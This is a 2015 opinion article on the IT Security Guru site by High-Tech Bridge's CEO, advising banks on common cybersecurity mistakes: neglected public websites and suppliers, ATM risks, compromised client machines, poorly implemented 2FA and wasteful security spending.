Eskenzi PR ad banner Eskenzi PR ad banner
  • About Us
Tuesday, 31 January, 2023
IT Security Guru
Eskenzi PR banner
  • Home
  • Features
  • Insight
  • Events
    • Most Inspiring Women in Cyber 2022
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Events
    • Most Inspiring Women in Cyber 2022
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
IT Security Guru
No Result
View All Result

Practical Risks and Real Remedies in E-Banking: the biggest mistakes banks make in defending against hackers

by The Gurus
June 11, 2015
in This Week's Gurus
Share on FacebookShare on Twitter

Practical Risks and Real Remedies in E-Banking: the biggest mistakes banks make in defending against hackers

By Ilia Kolochenko, CEO of High-Tech Bridge

Risk assessment needs to be comprehensive and global

Many financial institutions fail to perform comprehensive risk analysis and assessment, exposing their companies and clients to enormous risk. For example, many banks tend to underestimate or even ignore the security of their websites, focusing instead on “more sensitive” web applications such as e-banking. This is totally wrong, as even if the bank website does not contain any financial data, it is a perfect target for cybercriminals. For example, a medium-risk Cross-Site Scripting (XSS) vulnerability on the bank website may be used to perform spear-phishing campaigns against bank’s clients, infecting their PCs or mobile devices with a Trojan when visiting the website of the bank.
Other problems are outsourcing, external backup, and cloud. Many financial institutions completely ignore the fact that their IT supplier has a privileged access to financial records of the bank, and at the same time do not care about their own internal information security. Obviously, hackers would rather compromise a negligent IT supplier and get everything they need via him, instead of organizing expensive APTs against the bank itself. A “secure” externalization of backup and usage of a cloud has become very popular these days. Keep in mind that if a third-party provider transmitting, hosting, or processing your data is hacked, you are automatically hacked as well.
ATM machines are being compromised and hacked too! For example, a backdoor can eject all the cash out of the ATM when pressing a secret combination of keys instead of your pin. Did you include ATM protection in your cybersecurity plan, or are they still running Windows XP connected to the web?

End-users of e-banking shall be regarded as already compromised

Despite all the efforts taken by the antivirus industry, hackers are still more sophisticated than the security software. Kaspersky itself recently announced being hacked and infected with very complex and invisible malware… Almost any type of security of e-banking solution implemented on the client side can be by-passed if the client’s computer is compromised. One time passwords, two factor authentication, and all other modern security mechanisms will fail if a client’s machine is hacked. And, in combination with a tiny vulnerability on the bank website abandoned by the security team, uneducated users and smart hackers, a client will be hacked – it’s just a question of time.
Therefore, make sure that you have implemented a strict monitoring service that can notify your fraud prevention team about any abnormal activities and block or pause suspicions money transfers. Client notification by an external means, such as SMS or phone call, about any potentially suspicious activities with his or her account – can prevent many fraudulent transactions just in time. Every single minute is important to stop illegal transaction, otherwise money will leave the account and you will never ever see it again.
Every single user of e-banking shall be considered as hacked and compromised. In this area, paranoia is less expensive to the business than negligence.

Strong authentication should be implemented properly

Two Factor Authentication (2FA) and One Time Passwords (OTP) may be evil is implemented wrongly. I know a bank that replaced old fashion scratch cards with more “modern” notification by SMS for their mobile banking solution. The problem was that the card was usually stored separately from the mobile phone, and in case of a robbery, criminals could not access your bank account. However, with this security upgrade, it became enough to steal your mobile phone to get unlimited access to your bank account!
Therefore, when you implement new security solutions, make sure that they are appropriate for your business environment, otherwise you are just harming your business.

Cybersecurity solutions need to be both efficient and effective

Many financial organizations spend huge amount on cybersecurity solutions without analyzing if these solutions are effective, necessary, appropriate, and compatible with their particular business environment and business needs.
I have seen small organizations who spent hundreds of thousands dollars on expensive Data Leakage Prevention (DLP) solutions, leaving their front-end applications with critical data unprotected. Just because security vendors showed them Gartner’s report saying that 90% of threats are coming from insiders…
Another common case is expensive security solutions purchased in the sake of compliance or ordered directly by the management being scared to death by cybersecurity media hype. Due to the high complexity of configuration and management, those expensive boxes were abandoned by IT teams in default configuration, leaving corporate infrastructure as vulnerable as if they didn’t exist. Remember, spending a lot on your IT security does not mean spending wisely.

FacebookTweetLinkedIn
Tags: Cyber Securitydata breachHackHackershackinginfosecinfosecurityit security
ShareTweetShare
Previous Post

OPSWAT report reveals that the majority of Mac devices still remain unprotected

Next Post

Plenty of phish in the sea, warns ESC Global Security

Recent News

JD Sports admits data breach

JD Sports admits data breach

January 31, 2023
Acronis seals cyber protection partnership with Fulham FC

Acronis seals cyber protection partnership with Fulham FC

January 30, 2023
Data Privacy Day: Securing your data with a password manager

Data Privacy Day: Securing your data with a password manager

January 27, 2023
#MIWIC2022: Carole Embling, Metro Bank

#MIWIC2022: Carole Embling, Metro Bank

January 26, 2023

The IT Security Guru offers a daily news digest of all the best breaking IT security news stories first thing in the morning! Rather than you having to trawl through all the news feeds to find out what’s cooking, you can quickly get everything you need from this site!

Our Address: 10 London Mews, London, W2 1HY

Follow Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Events
    • Most Inspiring Women in Cyber 2022
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

This site uses functional cookies and external scripts to improve your experience.

Privacy settings

Privacy Settings / PENDING

This site uses functional cookies and external scripts to improve your experience. Which cookies and scripts are used and how they impact your visit is specified on the left. You may change your settings at any time. Your choices will not impact your visit.

NOTE: These settings will only apply to the browser and device you are currently using.

GDPR Compliance

Powered by Cookie Information